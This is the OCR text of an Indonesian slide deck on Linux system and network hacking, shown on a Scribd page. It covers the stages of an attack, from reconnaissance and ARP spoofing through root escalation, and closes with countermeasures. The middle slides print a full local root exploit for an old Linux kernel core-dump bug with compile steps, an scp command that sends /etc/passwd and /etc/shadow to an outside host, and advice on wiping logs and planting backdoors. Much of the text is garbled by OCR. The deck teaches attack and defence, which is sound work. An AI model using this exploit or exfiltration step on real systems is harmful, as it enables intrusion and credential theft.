Scribd Logo
Unggah

Selamat datang di Scribd!

  • System and Network Hacking

    Diunggah oleh

    Agung Setiajati
    6 tayangan22 halaman

    Hak Cipta

    © Attribution Non-Commercial (BY-NC)

    Format Tersedia

    PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini

    Hak Cipta:

    Attribution Non-Commercial (BY-NC)
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    6 tayangan22 halaman

    System and Network Hacking

    Diunggah oleh

    Agung Setiajati

    Hak Cipta:

    Attribution Non-Commercial (BY-NC)
    Unduh sebagai PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 22

    System and Network Hacking

    using Linux
    Josua M Sinambela System & Network Administrator EE & MTI e!t" #$M

    Metodologi Hacking
    % % % % % % &econnaissance Scanning dan enumeration $aining access Escalation o' !ri(ilege Maintaining access )o(ering tracks and !lacing backdoors

    &econnaissance
    % Mencari in'ormasi sebanyak mungkin mengenai target
    * +ro'il !erusa,aan- !eker.a/karyawan- email address- tele!on" * &esource in'rastruktur TI * NS 0uery se!erti w,ois- dig- nslooku!traceroute"

    Scanning dan enumeration


    % Memetakan !ort- layanan dan .enis a!likasi ,ingga (ersi so'tware yang digunakan" % Menggunakan +ort Scanner dan +ing Swee!
    * * * * +ort yang terbuka 1T)+/# +2 Mengeta,ui .enis Sistem 3!erasi Mengeta,ui (ersi a!likasi atau ser(ices Menda!atkan target yang memiliki a!likasi yang (ulnerable 1memiliki kelema,an/bugs2

    % Mengu.i dan menda!atkan in'ormasi yang lebi, (alid 1)onto,4 banner grabing2" % emo 4 menggunakan tools multi'ungsi nc 1netcat T)+/I+ swiss army kni'e5 2

    $aining access
    % 6ase atau ta,a!an yang !aling !enting dari sebua, serangan- yakni menda!atkan akses 1user2" % 7utu, kemam!uan menganalisa dan kea,lian k,usus ter,ada! ,asil scanning dan enumeration" % Merancang skenario untuk menda!atkan akses user berdasarkan data in'ormasi yang suda, di!erole,

    $aining access 1cont"2


    Contoh 1 4

    $aining access 1cont"2


    Contoh 2 4

    $aining access 1cont"2


    A&+ 8ulnerable

    $aining access 1cont"2


    +en.a,at akti' melakukan mengirimkan A&+ &e!ly

    $aining access 1cont"2


    Man In T,e Middle 1MITM2 berlangsung

    $aining access 1cont"2


    % Agar lebi, e'isien waktu- setela, MITM ber,asil- +en.a,at da!at melakukan 9Social Engineering % Si :orban diminta melakukan akses ke Ser(er 1misalnya akses email (ia +3+; atau akses 6T+2 % Jika si :orban melakukan akses tersebut- maka 7333M< Akses user/!assword akan muda, dida!at""

    Escalation o' !ri(ilege


    % Setela, menda!atkan account korban yang berstatus user biasa- seorang +en.a,at tidak ce!at !uas" Setia! ,acker !asti menginginkan !ri(ilege atau kekuasaan yang lebi, tinggi setara administrator atau root 1su!eruser2" % #ntuk meningkatkan !ri(ilege atau menda!atkan kekuasaan yang lebi, tinggi!ara ,acker akan meman'aatkan bugs=bugs yang banyak terda!at !ada a!likasi system lokal atau Sistem 3!erasi

    Escalation o' !ri(ilege 1)ont"2


    % Jika akti' mengikuti website- 'orum dan mailing list security- tidak akan sulit untuk menemukan bugs !ada kernel mau!un a!likasi !ada sebua, ser(er dengan adanya akses lokal" % Misalnya 4 Sistem 3!erasi !ada ser(er adala, #buntu a!!er >"?> dengan (ersi kernel bawaan 1de'ault2 instalasi- dimana terda!at bugs yang memungkinkan system diex!loitasi untuk menda!atkan !ri(ilege root 1su!eruser2

    Escalation o' !ri(ilege 1)ont"2


    % Script Exploit (Script Kiddies)
    * Local r00t Exploit Kernel Linux dengan bugs P C!L Core "u#p $andling untu% &ersi Kernel 2'('x ()* 2'('1+ ,, - 2'('1.'/) * "itulis oleh 4
    * dre0er luna1aditel'org * o2a3So4t ro#an1rs5labs'co#

    * "ipublish di #ailing5list bugtra6 10 7uli 200(

    /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ /@ Local r??t Ex!loit 'or4 @/ /@ Linux :ernel +&)TL )ore um! Handling @/ /@ 1 7I ABBCD / )8E=E??>=EDFA 2 @/ /@ :ernel E">"x 1GH E">"A; && I E">"AC"D2 @/ /@ 7y4 @/ /@ = dreyer IlunaJaditel"orgG 1main +o) code2 @/ /@ = &oMaNSo6t IromanJrs=labs"comG 1local root code2 @/ /@ K A?"Jul"E??> L @/ /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/ Minclude Istdio",G Minclude Isys/time",G Minclude Isys/resource",G Minclude Iunistd",G Minclude Ilinux/!rctl",G Minclude Istdlib",G Minclude Isys/ty!es",G Minclude Isignal",G c,ar @!ayloadHNOnSHELLH/bin/s,On+ATHH/usr/local/sbin4/usr/local/bin4/sbin4/bin4/usr/sbin4/usr/binOn@ @ @ @ @ root c! /bin/s, /tm!/s, P c,own root /tm!/s, P c,mod DCFF /tm!/s, P rm =' /etc/cron"d/coreOnNP int main12 Q int c,ildP struct rlimit corelimitP !rint'1NLinux :ernel E">"x +&)TL )ore um! Handling = Local r??tOnN2P !rint'1N7y4 dreyer & &oMaNSo6tOnN2P !rint'1NK A?"Jul"E??> LOnOnN2P corelimit"rlimRcur H &LIMRIN6INITSP corelimit"rlimRmax H &LIMRIN6INITSP setrlimit1&LIMITR)3&E- &corelimit2P !rint'1NK@L )reating )ron entryOnN2P i' 1 <1 c,ild H 'ork12 22 Q c,dir1N/etc/cron"dN2P !rctl1+&RSETR #M+A7LE- E2P slee!1E??2P exit1A2P T kill1c,ild- SI$SE$82P !rint'1NK@L Slee!ing 'or a!rox" one minute 1@@ !lease wait @@2OnN2P slee!1>E2P !rint'1NK@L &unning s,ell 1remember to remo(e /tm!/s, w,en 'inis,ed2 """OnN2P system1N/tm!/s, =iN2P T

    Escalation o' !ri(ilege 1)ont"2


    % Sim!an scri!t tersebut sebagai 'ile exploit.c % :om!ilasi dengan $ gcc o exploit exploit.c % Jalankan ./exploit % dan 7333M < % 8hoa#i U Success to be r??t <<<

    Maintaining access
    % Syalalalala "" I get 'ull access system % scp 9etc9pass8d 9etc9shado8 hac%er1so#eaddres'net: ripper9;ohn9%ole%si % e'aced U No no no "" ItVs not 'un

    % Install rootkit

    )o(ering tracks dan !lacing backdoors


    % $ilang%an ;e;a% di /(ar/log/@ - ,ist'ile- scri!t dll % <ac%dooring- misal menggunakan tools netcat (nc) atau rootkit

    )ountermeasure
    % Network Scanning s!t nma!- netcat- su!erscan dstda!at dimonitoring dengan NI S 1Network Instrusion etection System2 se!erti snort dan I+S 1Instrusion +re(enting System2- s!t snortRinline" )ara ker.anya- setela, I S mendeteksi adanya serangan atau scanning ter,ada! ser(er- maka akan ada trigger yang mengakti'kan untuk 'irewall untuk memblok I+ atau attacker tersebut 1I+S2" % )ara lain- meman'aatkan A)L 1otorisasi2 s!t dengan T)+wra!!er atau i!tables untuk mem'ilter akses ter,ada! layanan 1ser(ices2 yang tersedia termasuk I)M+" Se,ingga ,anya dari .aringan atau network tertentu sa.a layanan tersebut da!at diakses"

    )ountermeasure 1)ont"2
    % #ntuk mencega, dan mendeteksi ter.adinya A&+ s!oo'ing- da!at menggunakan tools A&+watc," Tools ini akan melakukan monitoring !ada sebua, inter'ace yang dalam kondisi !romiscuous- dan merekam MA)/I+ address selama waktu tertentu" :etika ter.adi anomali se!erti adanya !ergantian MA) atau I+ address- maka a!likasi ini akan mengirimkan !esan !eringatan ke ser(er syslog 1System Logging2" % #ntuk mengatasi atau ter,indar dari akti(itas !enyada!an atau sni''ing- usa,akan menggunakan layanan dengan !rotokol yang aman 1secure2- se!erti teknologi enkri!si- SSL atau TLS misalnya ,tt!s!o!;s- ss,- s't! dst"

    )ountermeasure 1)ont"2
    % #ntuk mencega, local r??t ex!loit kernel se!erti diatas ada berbagai cara yang da!at dilakukan- yang !aling baikmelakukan u!grade kernel linux- dan .angan lu!a untuk selalu mengikuti mailing list dan website security s!t bugtra0- security'ocus- !acketstormsecurity dst " % :,usus untuk mencega, scri!t ex!loit diatas- cara mengatasi WsementaraW da!at dilakukan dengan command berikut 1dengan user su!eruser24
    = s0sctl 58 %ernel'core>pattern*9de&9null atau = echo 9de&9null ) 9proc9s0s9%ernel9core>pattern Su!aya bersi'at 'ix da!at dilakukan dengan 4 = echo s0sctl 58 %ernel'core>pattern*9de&9null )) 9etc9s0sctl'con?

    % +ertanyaan U % Saran U SELESAI

    !$@3KS

    Anda mungkin juga menyukai